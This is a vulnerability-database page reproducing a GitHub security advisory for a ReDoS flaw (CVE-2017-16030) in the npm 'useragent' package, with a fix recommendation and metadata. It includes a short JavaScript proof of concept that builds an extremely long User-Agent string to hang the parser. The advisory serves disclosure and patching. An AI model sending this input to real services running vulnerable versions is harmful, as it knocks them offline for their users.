Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

GHSA-pjmx-9xr3-82qr

GitHub Security Advisory

ReDoS via long UserAgent header in useragent

✓ GitHub Reviewed HIGH Has CVE
View on GitHub

Advisory Details

Affected versions of `useragent` are vulnerable to regular expression denial of service when an arbitrarily long `User-Agent` header is parsed.

## Proof of Concept
```js
var useragent = require('useragent');

var badUserAgent = 'MSIE 0.0'+Array(900000).join('0')+'XBLWP';
var request = 'GET / HTTP/1.1\r\nUser-Agent: ' + badUserAgent + '\r\n\r\n';
console.log(useragent.parse(request));
```

## Recommendation

Update to version 2.1.13 or later.

Affected Packages

npm useragent
Affected versions: 0 (fixed in 2.1.13)

Related CVEs

CVE-2017-16030

Key Information

GHSA ID
GHSA-pjmx-9xr3-82qr
Published
July 24, 2018 7:59 PM
Last Modified
September 6, 2023 8:07 PM
CVSS Score
7.5 /10
Primary Ecosystem
npm
Primary Package
useragent
GitHub Reviewed
✓ Yes

Dataset

Last updated: August 29, 2025 6:30 AM

Data from GitHub Advisory Database. This information is provided for research and educational purposes.